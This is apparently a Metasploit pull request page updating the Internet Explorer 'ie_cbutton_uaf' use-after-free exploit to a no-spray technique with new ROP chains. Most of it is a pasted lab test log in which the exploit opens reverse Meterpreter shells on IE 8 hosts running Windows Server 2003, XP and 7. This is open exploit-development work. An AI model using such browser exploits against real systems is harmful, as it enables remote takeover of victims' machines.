Implement WTFuzz's no-spray technique #1232
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
e-mail update.
Do not try to bend the spoon, that is impossible. Instead, only try to realize the truth: there is no spoon.
|
Test:
msf > use exploit/windows/browser/ie_cbutton_uaf msf exploit(ie_cbutton_uaf) > rexploit [*] Reloading module... [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.128:4444 [*] Using URL: http://0.0.0.0:8080/bXY5RN [*] Local IP: http://192.168.1.128:8080/bXY5RN [*] Server started. msf exploit(ie_cbutton_uaf) > [*] 192.168.1.136 ie_cbutton_uaf - Requesting: /bXY5RN [*] 192.168.1.136 ie_cbutton_uaf - Target selected as: IE 8 on Windows Server 2003 [*] 192.168.1.136 ie_cbutton_uaf - Sending HTML... [*] Sending stage (752128 bytes) to 192.168.1.136 [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.136:1122) at 2013-01-03 19:42:22 +0100 [*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.136:1122) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3676) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3824 msf exploit(ie_cbutton_uaf) > sessuibs[+] Successfully migrated to process [-] Unknown command: sessuibs. msf exploit(ie_cbutton_uaf) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 JUAN-6ED9DB6CA8\Administrator @ JUAN-6ED9DB6CA8 192.168.1.128:4444 -> 192.168.1.136:1122 (192.168.1.136) msf exploit(ie_cbutton_uaf) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : JUAN-6ED9DB6CA8 OS : Windows .NET Server (Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter...
[*] 192.168.1.142 ie_cbutton_uaf - Requesting: /bXY5RN [*] 192.168.1.142 ie_cbutton_uaf - Target selected as: IE 8 on Windows XP SP3 [*] 192.168.1.142 ie_cbutton_uaf - Sending HTML... [*] Sending stage (752128 bytes) to 192.168.1.142 [*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.142:2976) at 2013-01-03 19:44:10 +0100 [*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.142:2976) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3976) [*] Spawning notepad.exe process to migrate to [+] Migrating to 540 [+] Successfully migrated to process msf exploit(ie_cbutton_uaf) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter x86/win32 JUAN-C0DE875735\Administrator @ JUAN-C0DE875735 192.168.1.128:4444 -> 192.168.1.142:2976 (192.168.1.142) msf exploit(ie_cbutton_uaf) > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo Computer : JUAN-C0DE875735 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit
[*] 192.168.1.137 ie_cbutton_uaf - Requesting: /bXY5RN [*] 192.168.1.137 ie_cbutton_uaf - Target selected as: IE 8 on Windows 7 [*] 192.168.1.137 ie_cbutton_uaf - Sending HTML... [*] Sending stage (752128 bytes) to 192.168.1.137 [*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.137:49161) at 2013-01-03 19:45:32 +0100 exit[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.137:49161) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (512) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3796 [+] Successfully migrated to process [*] You have active sessions open, to exit anyway type "exit -y" msf exploit(ie_cbutton_uaf) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 3 meterpreter x86/win32 WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7 192.168.1.128:4444 -> 192.168.1.137:49161 (192.168.1.137) msf exploit(ie_cbutton_uaf) > session -i 3 [-] Unknown command: session. msf exploit(ie_cbutton_uaf) > sysinfo [-] Unknown command: sysinfo. msf exploit(ie_cbutton_uaf) > sessions -i 3 [*] Starting interaction with 3... meterpreter > sysinfo Computer : WIN-RNJ7NBRK9L7 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.137 - Meterpreter session 3 closed. Reason: User exit Merging! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Replaces the good old heaplib spray. Also the trigger is updated. ROP chains are different than the ones in RopDb (null-byte-free).
I don't know why for some reasons I have 7 other updates in there while git status tells me nothing about it. But it's ok, because we need to update James' e-mail anyways.